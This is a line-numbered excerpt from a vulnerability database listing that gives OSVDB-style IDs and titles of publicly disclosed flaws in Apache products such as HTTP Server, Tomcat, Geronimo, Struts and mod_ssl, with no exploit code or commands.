16707| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
16708| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
16709| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
16710| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
16711| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
16712| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
16713| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
16714| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
16715| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
16716| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
16717| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
16718| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
16719| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
16720| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
16721| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
16722| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
16723| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
16724| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
16725| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
16726| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
16727| [58687] Apache Axis Invalid wsdl Request XSS
16728| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
16729| [58685] Apache Velocity Template Designer Privileged Code Execution
16730| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
16731| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
16732| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
16733| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
16734| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
16735| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
16736| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
16737| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
16738| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
16739| [58667] Apache Roller Database Cleartext Passwords Disclosure
16740| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
16741| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
16742| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
16743| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
16744| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
16745| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
16746| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
16747| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
16748| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
16749| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
16750| [56984] Apache Xerces2 Java Malformed XML Input DoS
16751| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
16752| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
16753| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
16754| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
16755| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
16756| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
16757| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
16758| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
16759| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
16760| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
16761| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
16762| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
16763| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
16764| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
16765| [55056] Apache Tomcat Cross-application TLD File Manipulation
16766| [55055] Apache Tomcat Illegal URL Encoded Password Request Username Enumeration
16767| [55054] Apache Tomcat Java AJP Connector mod_jk Load Balancing Worker Malformed Header Remote DoS
16768| [55053] Apache Tomcat Crafted Request Security Restraint Bypass Arbitrary Content Access
16769| [54733] Apache HTTP Server AllowOverride Directive .htaccess Options Bypass
16770| [54713] razorCMS Security Manager apache User Account Unspecified File Permission Weakness Issue
16771| [54589] Apache Jserv Nonexistent JSP Request XSS
16772| [54122] Apache Struts s:a / s:url Tag href Element XSS
16773| [54093] Apache ActiveMQ Web Console JMS Message XSS
16774| [53932] Apache Geronimo Multiple Admin Function CSRF
16775| [53931] Apache Geronimo /console/portal/Server/Monitoring Multiple Parameter XSS
16776| [53930] Apache Geronimo /console/portal/ URI XSS
16777| [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload
16778| [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload
16779| [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload
16780| [53921] Apache HTTP Server mod_proxy_ajp Cross Thread/Session Information Disclosure
16781| [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
16782| [53574] PHP on Apache .htaccess mbstring.func_overload Setting Cross Hosted Site Behavior Modification
16783| [53381] Apache Tomcat JK Connector Content-Length Header Cross-user Information Disclosure
16784| [53380] Apache Struts Unspecified XSS
16785| [53289] Apache mod_perl Apache::Status /perl-status Unspecified XSS
16786| [53186] Apache HTTP Server htpasswd Predictable Salt Weakness
16787| [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
16788| [52407] Apache Tomcat doRead Method POST Content Information Disclosure
16789| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
16790| [51613] Apache HTTP Server Third-party Module Child Process File Descriptor Leak
16791| [51612] Apache HTTP Server Internal Redirect Handling Infinite Loop DoS
16792| [51468] Apache Jackrabbit Content Repository (JCR) swr.jsp q Parameter XSS
16793| [51467] Apache Jackrabbit Content Repository (JCR) search.jsp q Parameter XSS
16794| [51151] Apache Roller Search Function q Parameter XSS
16795| [50482] PHP with Apache php_value Order Unspecified Issue
16796| [50475] Novell NetWare ApacheAdmin Console Unauthenticated Access
16797| [49734] Apache Struts DefaultStaticContentLoader Class Traversal Arbitrary File Access
16798| [49733] Apache Struts FilterDispatcher Class Traversal Arbitrary File Access
16799| [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
16800| [49062] Apache Tomcat Cross-thread Concurrent Request Variable Overwrite Information Disclosure
16801| [48847] ModSecurity (mod_security) Transformation Caching Unspecified Apache DoS
16802| [48788] Apache Xerces-C++ XML Schema maxOccurs Value XML File Handling DoS
16803| [47474] Apache HTTP Server mod_proxy_ftp Directory Component Wildcard Character XSS
16804| [47464] Apache Tomcat allowLinking / UTF-8 Traversal Arbitrary File Access
16805| [47463] Apache Tomcat RequestDispatcher Traversal Arbitrary File Access
16806| [47462] Apache Tomcat HttpServletResponse.sendError Method Message Argument XSS
16807| [47096] Oracle Weblogic Apache Connector POST Request Overflow
16808| [46382] Frontend Filemanager (air_filemanager) Extension for TYPO3 on Apache Unspecified Arbitrary Code Execution
16809| [46285] TYPO3 on Apache Crafted Filename Upload Arbitrary Command Execution
16810| [46085] Apache HTTP Server mod_proxy ap_proxy_http_process_response() Function Interim Response Forwarding Remote DoS
16811| [45905] Apache Tomcat Host Manager host-manager/html/add name Parameter XSS
16812| [45879] Ragnarok Online Control Panel on Apache Crafted Traversal Authentication Bypass
16813| [45742] Apache HTTP Server on Novell Unspecified Request Directive Internal IP Disclosure
16814| [45740] Apache Derby DropSchemaNode Bind Phase Arbitrary Scheme Statement Dropping
16815| [45599] Apache Derby Lock Table Statement Privilege Requirement Bypass Arbitrary Table Lock
16816| [45585] Apache Derby ACCSEC Command RDBNAM Parameter Cleartext Credential Disclosure
16817| [45584] Apache Derby DatabaseMetaData.getURL Function Cleartext Credential Disclosure
16818| [45420] Apache HTTP Server 403 Error Page UTF-7 Encoded XSS
16819| [44728] PHP Toolkit on Gentoo Linux Interpretation Conflict Apache HTTP Server Local DoS
16820| [44618] Oracle JSP Apache/Jserv Path Translation Traversal Arbitrary JSP File Execution
16821| [44159] Apache HTTP Server Remote Virtual Host Name Disclosure
16822| [43997] Apache-SSL ExpandCert() Function Certificate Handling Arbitrary Environment Variables Manipulation
16823| [43994] suPHP for Apache (mod_suphp) Directory Symlink Local Privilege Escalation
16824| [43993] suPHP for Apache (mod_suphp) Owner Mode Race Condition Symlink Local Privilege Escalation
16825| [43663] Apache HTTP Server Mixed Platform AddType Directive Crafted Request PHP Source Disclosure
16826| [43658] AuthCAS Module (AuthCAS.pm) for Apache HTTP Server SESSION_COOKIE_NAME SQL Injection
16827| [43452] Apache Tomcat HTTP Request Smuggling
16828| [43309] Apache Geronimo LoginModule Login Method Bypass
16829| [43290] Apache JSPWiki Entry Page Attachment Unrestricted File Upload
16830| [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption
16831| [43224] Apache Geronimo on SuSE Linux init Script Symlink Unspecified File/Directory Access
16832| [43189] Apache mod_jk2 Host Header Multiple Fields Remote Overflow
16833| [42937] Apache HTTP Server mod_proxy_balancer balancer-manager Unspecified CSRF
16834| [42341] MOD_PLSQL for Apache Unspecified URL SQL Injection
16835| [42340] MOD_PLSQL for Apache CGI Environment Handling Unspecified Overflow
16836| [42214] Apache HTTP Server mod_proxy_ftp UTF-7 Encoded XSS
16837| [42091] Apache Maven Site Plugin Installation Permission Weakness
16838| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
16839| [42088] Apache Maven Defined Repo Process Listing Password Disclosure
16840| [42087] Apache Maven Site Plugin SSH Deployment Permission Setting Weakness
16841| [42036] Apache HTTP Server MS-DOS Device Request Host OS Disclosure
16842| [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
16843| [41436] Apache Tomcat Native APR Connector Duplicate Request Issue
16844| [41435] Apache Tomcat %5C Cookie Handling Session ID Disclosure
16845| [41434] Apache Tomcat Exception Handling Subsequent Request Information Disclosure
16846| [41400] LimeSurvey save.php Apache Log File PHP Code Injection
16847| [41029] Apache Tomcat Calendar Examples Application cal2.jsp Multiple Parameter CSRF
16848| [41019] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload XSS
16849| [41018] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload CRLF
16850| [40853] Apache Tomcat SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) JSESSIONIDSSO Cookie Security Weakness
16851| [40264] Apache HTTP Server mod_proxy_balancer balancer_handler Function bb Variable Remote DoS
16852| [40263] Apache HTTP Server mod_proxy_balancer balancer-manager Multiple Parameter XSS
16853| [40262] Apache HTTP Server mod_status refresh XSS
16854| [39833] Apache Tomcat JULI Logging Component catalina.policy Security Bypass
16855| [39251] Coppermine Photo Gallery on Apache Multiple File Extension Upload Arbitrary Code Execution
16856| [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure
16857| [39134] Apache mod_imagemap Module Imagemap Unspecified XSS
16858| [39133] Apache mod_imap Module Imagemap File Unspecified XSS
16859| [39035] Apache Tomcat examples/servlet/CookieExample Multiple Parameter XSS
16860| [39003] Apache HTTP Server HTTP Method Header Request Entity Too Large XSS
16861| [39000] Apache Tomcat SendMailServlet sendmail.jsp mailfrom Parameter XSS
16862| [38939] Apache HTTP Server Prefork MPM Module Array Modification Local DoS
16863| [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
16864| [38662] Apache Geronimo SQLLoginModule Nonexistent User Authentication Bypass
16865| [38661] Apache Geronimo MEJB Unspecified Authentication Bypass
16866| [38641] Apache HTTP Server mod_mem_cache recall_headers Function Information Disclosure
16867| [38640] Apache HTTP Server suexec Document Root Unauthorized Operations
16868| [38639] Apache HTTP Server suexec Multiple Symlink Privilege Escalation
16869| [38636] Apache HTTP Server mod_autoindex.c P Variable UTF-7 Charset XSS
16870| [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
16871| [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
16872| [37079] Apache HTTP Server mod_cache cache_util.c Malformed Cache-Control Header DoS
16873| [37071] Apache Tomcat Cookie Handling Session ID Disclosure
16874| [37070] Apache Tomcat Cookie Handling Quote Delimiter Session ID Disclosure
16875| [37052] Apache HTTP Server mod_status mod_status.c Unspecified XSS
16876| [37051] Apache HTTP Server mod_proxy modules/proxy/proxy_util.c Crafted Header Remote DoS
16877| [37050] Apache HTTP Server Prefork MPM Module Crafted Code Sequence Local DoS
16878| [36417] Apache Tomcat Host Manager Servlet html/add Action aliases Parameter XSS
16879| [36377] Apache MyFaces Tomahawk JSF Application autoscroll Multiple Script XSS
16880| [36080] Apache Tomcat JSP Examples Crafted URI XSS
16881| [36079] Apache Tomcat Manager Uploaded Filename XSS
16882| [34888] Apache Tomcat Example Calendar Application cal2.jsp time Parameter XSS
16883| [34887] Apache Tomcat implicit-objects.jsp Crafted Header XSS
16884| [34885] Apache Tomcat on IIS Servlet Engine MS-DOS Device Request DoS
16885| [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure
16886| [34883] Apache Tomcat Crafted JSP File Request Path Disclosure
16887| [34882] Apache Tomcat Default SSL Ciphersuite Configuration Weakness
16888| [34881] Apache Tomcat Malformed Accept-Language Header XSS
16889| [34880] Apache Tomcat HTTP/1.1 Connector NULL Byte Request JSP Source Disclosure
16890| [34879] Apache Tomcat examples/jsp2/jspx/textRotate.jspx XSS
16891| [34878] Apache Tomcat examples/jsp2/el/implicit-objects.jsp XSS
16892| [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
16893| [34876] Apache HTTP Server ScriptAlias CGI Source Disclosure
16894| [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
16895| [34874] Apache Tomcat AJP Connector mod_jk ajp_process_callback Remote Memory Disclosure
16896| [34873] Apache Stats Variable Extraction _REQUEST Ssuperglobal Array Overwrite
16897| [34872] Apache HTTP Server suexec User/Group Combination Weakness Local Privilege Escalation
16898| [34769] Apache Tomcat w/ Proxy Module Double Encoded Traversal Arbitrary File Access
16899| [34541] mod_perl for Apache HTTP Server RegistryCooker.pm PATH_INFO Crafted URI Remote DoS
16900| [34540] mod_perl for Apache HTTP Server PerlRun.pm PATH_INFO Crafted URI Remote DoS
16901| [34398] Apache Tomcat mod_jk Invalid Chunked Encoded Body Information Disclosure
16902| [34154] Apache Axis Nonexistent Java Web Service Path Disclosure
16903| [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
16904| [33816] Apache HTTP Server on Debian Linux TTY Local Privilege Escalation
16905| [33456] Apache HTTP Server Crafted TCP Connection Range Header DoS
16906| [33346] Avaya Multiple Products Apache Tomcat Port Weakness
16907| [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
16908| [32978] Apache Java Mail Enterprise Server (JAMES) POP3Server Log File Plaintext Password Disclosure
16909| [32724] Apache mod_python _filter_read Freed Memory Disclosure
16910| [32723] Apache Tomcat semicolon Crafted Filename Request Forced Directory Listing
16911| [32396] Apache Open For Business Project (OFBiz) Ecommerce Component Forum Implementation Message Body XSS
16912| [32395] Apache Open For Business Project (OFBiz) Ecommerce Component Form Field Manipulation Privilege Escalation
16913| [30354] Linux Subversion libapache2-svn Search Path Subversion Local Privilege Escalation
16914| [29603] PHP ini_restore() Apache httpd.conf Options Bypass
16915| [29536] Apache Tcl mod_tcl set_var Function Remote Format String
16916| [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
16917| [28130] PHP with Apache Mixed Case Method Limit Directive Bypass
16918| [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure
16919| [27588] Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
16920| [27487] Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection
16921| [26935] FCKeditor on Apache connector.php Crafted File Extension Arbitrary File Upload
16922| [26572] Apache Java Mail Enterprise Server (JAMES) MAIL Command Overflow DoS
16923| [25909] Drupal on Apache files Directory File Upload Arbitrary Code Execution
16924| [24825] Oracle ModPL/SQL for Apache Unspecified Remote HTTP Issue
16925| [24365] Apache Struts Multiple Function Error Message XSS
16926| [24364] Apache Struts getMultipartRequestHandler() Function Crafted Request DoS
16927| [24363] Apache Struts org.apache.struts.taglib.html.Constants.CANCEL Validation Bypass
16928| [24103] Pubcookie Apache mod_pubcookie Unspecified XSS
16929| [23906] Apache mod_python for Apache HTTP Server FileSession Privileged Local Command Execution
16930| [23905] Apache Log4net LocalSyslogAppender Format String Memory Corruption DoS
16931| [23198] Apache WSS4J Library SOAP Signature Verification Bypass
16932| [23124] Generic Apache Request Library (libapreq) apreq_parse_* Functions Remote DoS
16933| [22652] mod_php for Apache HTTP Server Crafted import_request_variables Function DoS
16934| [22475] PHP w/ Apache PDO::FETCH_CLASS __set() Function DoS
16935| [22473] PHP w/ Apache2 Crafted PDOStatement DoS
16936| [22459] Apache Geronimo Error Page XSS
16937| [22458] Apache Tomcat / Geronimo Sample Script cal2.jsp time Parameter XSS
16938| [22301] auth_ldap for Apache HTTP Server auth_ldap_log_reason() Function Remote Format String
16939| [22261] Apache HTTP Server mod_ssl ssl_hook_Access Error Handling DoS
16940| [22259] mod_auth_pgsql for Apache HTTP Server Log Function Format String
16941| [21736] Apache Java Mail Enterprise Server (JAMES) Spooler retrieve Function DoS
16942| [21705] Apache HTTP Server mod_imap Image Map Referer XSS
16943| [21021] Apache Struts Error Message XSS
16944| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
16945| [20491] PHP mod_php apache2handler SAPI Crafted .htaccess DoS
16946| [20462] Apache HTTP Server worker.c MPM Memory Exhaustion DoS
16947| [20439] Apache Tomcat Directory Listing Saturation DoS
16948| [20373] Apache Tomcat on HP Secure OS for Linux Unspecified Servlet Access Issue
16949| [20285] Apache HTTP Server Log File Control Character Injection
16950| [20242] Apache HTTP Server mod_usertrack Predictable Session ID Generation
16951| [20209] Brainf*ck Module (mod_bf) for Apache HTTP Server Local Overflow
16952| [20033] Apache Tomcat MS-DOS Device Request Error Message Path Disclosure
16953| [19883] apachetop atop.debug Symlink Arbitrary File Overwrite
16954| [19863] mod_auth_shadow for Apache HTTP Server require group Authentication Bypass
16955| [19855] Apache HTTP Server ErrorDocument Directive .htaccess Bypass
16956| [19821] Apache Tomcat Malformed Post Request Information Disclosure
16957| [19769] Apache HTTP Server Double-reverse DNS Lookup Spoofing
16958| [19188] Apache HTTP Server mod_ssl SSLVerifyClient Per-location Context Restriction Bypass
16959| [19137] Apache HTTP Server on Red Hat Linux Double Slash GET Request Forced Directory Listing
16960| [19136] Apache on Mandrake Linux Arbitrary Directory Forced Listing
16961| [18977] Apache HTTP Server Crafted HTTP Range Header DoS
16962| [18389] Ragnarok Online Control Panel Apache Authentication Bypass
16963| [18286] Apache HTTP Server mod_ssl ssl_callback_SSLVerify_CRL( ) Function Overflow
16964| [18233] Apache HTTP Server htdigest user Variable Overfow
16965| [17738] Apache HTTP Server HTTP Request Smuggling
16966| [16586] Apache HTTP Server Win32 GET Overflow DoS
16967| [15889] Apache HTTP Server mod_cgid Threaded MPM CGI Output Misdirection
16968| [14896] mod_dav for Apache HTTP Server Remote Null Dereference Child Process Termination
16969| [14879] Apache HTTP Server ap_log_rerror Function Error Message Path Disclosure
16970| [14770] Apache Tomcat AJP12 Protocol Malformed Packet Remote DoS
16971| [14597] Apache Tomcat IntegerOverflow.jsp Test JSP Script Path Disclosure
16972| [14596] Apache Tomcat pageSession.jsp Test JSP Script Path Disclosure
16973| [14595] Apache Tomcat pageLanguage.jsp Test JSP Script Path Disclosure
16974| [14594] Apache Tomcat pageIsThreadSafe.jsp Test JSP Script Path Disclosure
16975| [14593] Apache Tomcat pageIsErrorPage.jsp Test JSP Script Path Disclosure
16976| [14592] Apache Tomcat pageInvalid.jsp Test JSP Script Path Disclosure
16977| [14591] Apache Tomcat pageExtends.jsp Test JSP Script Path Disclosure
16978| [14590] Apache Tomcat pageDouble.jsp Test JSP Script Path Disclosure
16979| [14589] Apache Tomcat pageAutoFlush.jsp Test JSP Script Path Disclosure
16980| [14588] Apache Tomcat extends2.jsp Test JSP Script Path Disclosure
16981| [14587] Apache Tomcat extends1.jsp Test JSP Script Path Disclosure
16982| [14586] Apache Tomcat comments.jsp Test JSP Script Path Disclosure
16983| [14585] Apache Tomcat buffer4.jsp Test JSP Script Path Disclosure
16984| [14584] Apache Tomcat buffer3.jsp Test JSP Script Path Disclosure
16985| [14583] Apache Tomcat buffer2.jsp Test JSP Script Path Disclosure
16986| [14582] Apache Tomcat buffer1.jsp Test JSP Script Path Disclosure
16987| [14581] Apache Tomcat pageImport2.jsp Test JSP Script Path Disclosure
16988| [14580] Apache Tomcat pageInfo.jsp Test JSP Script Path Disclosure
16989| [14410] mod_frontpage for Apache HTTP Server fpexec Remote Overflow
16990| [14044] Apache Batik Squiggle Browser with Rhino Scripting Engine Unspecified File System Access
16991| [13737] mod_access_referer for Apache HTTP Server Malformed Referer DoS
16992| [13711] Apache mod_python publisher.py Traversal Arbitrary Object Information Disclosure
16993| [13640] mod_auth_any for Apache HTTP Server on Red Hat Linux Metacharacter Command Execution
16994| [13304] Apache Tomcat realPath.jsp Path Disclosure
16995| [13303] Apache Tomcat source.jsp Arbitrary Directory Listing
16996| [13087] Apache HTTP Server mod_log_forensic check_forensic Symlink Arbitrary File Creation / Overwrite
16997| [12849] mod_auth_radius for Apache HTTP Server radcpy() Function Overflow DoS
16998| [12848] Apache HTTP Server htdigest realm Variable Overflow
16999| [12721] Apache Tomcat examples/jsp2/el/functions.jsp XSS
17000| [12720] mod_dosevasive for Apache HTTP Server Symlink Arbitrary File Create/Overwrite
17001| [12558] Apache HTTP Server IPv6 FTP Proxy Socket Failure DoS
17002| [12557] Apache HTTP Server prefork MPM accept Error DoS
17003| [12233] Apache Tomcat MS-DOS Device Name Request DoS
17004| [12232] Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
17005| [12231] Apache Tomcat web.xml Arbitrary File Access
17006| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
17007| [12192] Apache HTTP Server on Mac OS X Unauthorized .ht and .DS_Store File Access
17008| [12178] Apache Jakarta Lucene results.jsp XSS
17009| [12176] mod_digest_apple for Apache HTTP Server on Mac OS X Authentication Replay
17010| [11391] Apache HTTP Server Header Parsing Space Saturation DoS
17011| [11003] Apache HTTP Server mod_include get_tag() Function Local Overflow
17012| [10976] mod_mylo for Apache HTTP Server mylo_log Logging Function HTTP GET Overflow
17013| [10637] Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
17014| [10546] Macromedia JRun4 mod_jrun Apache Module Remote Overflow
17015| [10471] Apache Xerces-C++ XML Parser DoS
17016| [10218] Apache HTTP Server Satisfy Directive Access Control Bypass
17017| [10068] Apache HTTP Server htpasswd Local Overflow
17018| [10049] mod_cplusplus For Apache HTTP Server Unspecified Overflow
17019| [9994] Apache HTTP Server apr-util IPV6 Parsing DoS
17020| [9991] Apache HTTP Server ap_resolve_env Environment Variable Local Overflow
17021| [9948] mod_dav for Apache HTTP Server LOCK Request DoS
17022| [9742] Apache HTTP Server mod_ssl char_buffer_read Function Reverse Proxy DoS
17023| [9718] Apache HTTP Server Win32 Single Dot Append Arbitrary File Access
17024| [9717] Apache HTTP Server mod_cookies Cookie Overflow
17025| [9716] Apache::Gallery Gallery.pm Inline::C Predictable Filename Code Execution
17026| [9715] Apache HTTP Server rotatelogs Control Characters Over Pipe DoS
17027| [9714] Apache Authentication Module Threaded MPM DoS
17028| [9713] Apache HTTP Server on OS2 filestat.c Device Name Request DoS
17029| [9712] Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
17030| [9711] Apache HTTP Server Access Log Terminal Escape Sequence Injection
17031| [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass
17032| [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution
17033| [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS
17034| [9707] Apache HTTP Server Duplicate MIME Header Saturation DoS
17035| [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
17036| [9705] Apache Tomcat Invoker/Default Servlet Source Disclosure
17037| [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
17038| [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing
17039| [9700] Apache HTTP Server mod_autoindex Multiple Slash Request Forced Directory Listing
17040| [9699] Apache HTTP Server mod_dir Multiple Slash Request Forced Directory Listing
17041| [9698] Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
17042| [9697] Apache HTTP Server htdigest Local Symlink Arbitrary File Overwrite
17043| [9696] Apache HTTP Server htpasswd Local Symlink Arbitrary File Overwrite
17044| [9695] Apache Tomcat SnoopServlet Servlet Information Disclosure
17045| [9694] PHP3 on Apache HTTP Server Encoded Traversal Arbitrary File Access
17046| [9693] mod_auth_pgsql_sys for Apache HTTP Server User Name SQL Injection
17047| [9692] Apache HTTP Server mod_vhost_alias Mass Virtual Hosting Arbitrary File Access
17048| [9691] Apache HTTP Server mod_rewrite Mass Virtual Hosting Arbitrary File Access
17049| [9690] Apache HTTP Server mod_vhost_alias CGI Program Source Disclosure
17050| [9689] Trustix httpsd for Apache-SSL Permission Weakness Privilege Escalation
17051| [9688] Apache HTTP Server mod_proxy Malformed FTP Command DoS
17052| [9687] Apache::AuthenSmb smbval SMB Authentication Library Multiple Overflows
17053| [9686] Apache::AuthenSmb smbvalid SMB Authentication Library Multiple Overflows
17054| [9523] Apache HTTP Server mod_ssl Aborted Connection DoS
17055| [9459] Oracle PL/SQL (mod_plsql) Apache Module Help Page Request Remote Overflow
17056| [9208] Apache Tomcat .jsp Encoded Newline XSS
17057| [9204] Apache Tomcat ROOT Application XSS
17058| [9203] Apache Tomcat examples Application XSS
17059| [9068] Apache HTTP Server mod_userdir User Account Information Disclosure
17060| [8773] Apache Tomcat Catalina org.apache.catalina.servlets.DefaultServlet Source Code Disclosure
17061| [8772] Apache Tomcat Catalina org.apache.catalina.connector.http DoS
17062| [7943] Apache HTTP Server mod_ssl sslkeys File Disclosure
17063| [7942] Apache HTTP Server mod_ssl Default Pass Phrase
17064| [7941] Apache HTTP Server mod_ssl Encrypted Private Key File Descriptor Leak
17065| [7935] Apache HTTP Server mod_ssl ssl_gcache Race Conditions
17066| [7934] Apache HTTP Server mod_ssl SSLSessionCache File Content Disclosure
17067| [7933] Apache HTTP Server mod_ssl SSLMutex File Content Disclosure
17068| [7932] Apache HTTP Server mod_ssl mkcert.sh File Creation Permission Weakness
17069| [7931] Apache HTTP Server mod_ssl X.509 Client Certificate Authentication Bypass
17070| [7930] Apache HTTP Server mod_ssl ssl_expr_eval_func_file() Overflow
17071| [7929] Apache HTTP Server mod_ssl ssl_engine_log.c mod_proxy Hook Function Remote Format String
17072| [7611] Apache HTTP Server mod_alias Local Overflow
17073| [7394] Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
17074| [7203] Apache Tomcat source.jsp Traversal Arbitrary File Access
17075| [7039] Apache HTTP Server on Mac OS X HFS+ File System Access Bypass
17076| [6882] Apache mod_python Malformed Query String Variant DoS
17077| [6839] Apache HTTP Server mod_proxy Content-Length Overflow
17078| [6630] Apache Tomcat Java Server Pages (JSP) Engine WPrinterJob() DoS
17079| [6472] Apache HTTP Server mod_ssl ssl_util_uuencode_binary Remote Overflow
17080| [5821] Apache HTTP Server Multiple / GET Remote Overflow DoS
17081| [5580] Apache Tomcat Servlet Malformed URL JSP Source Disclosure
17082| [5552] Apache HTTP Server split-logfile Arbitrary .log File Overwrite
17083| [5526] Apache Tomcat Long .JSP URI Path Disclosure
17084| [5278] Apache Tomcat web.xml Restriction Bypass
17085| [5051] Apache Tomcat Null Character DoS
17086| [4973] Apache Tomcat servlet Mapping XSS
17087| [4650] mod_gzip for Apache HTTP Server Debug Mode Printf Stack Overflow
17088| [4649] mod_gzip for Apache HTTP Server Debug Mode Format String Overflow
17089| [4648] mod_gzip for Apache HTTP Server Debug Mode Race Condition
17090| [4568] mod_survey For Apache ENV Tags SQL Injection
17091| [4553] Apache HTTP Server ApacheBench Overflow DoS
17092| [4552] Apache HTTP Server Shared Memory Scoreboard DoS
17093| [4446] Apache HTTP Server mod_disk_cache Stores Credentials
17094| [4383] Apache HTTP Server Socket Race Condition DoS
17095| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
17096| [4340] Apache Portable Runtime (APR) apr_psprintf DoS
17097| [4232] Apache Cocoon DatabaseAuthenticatorAction SQL Injection
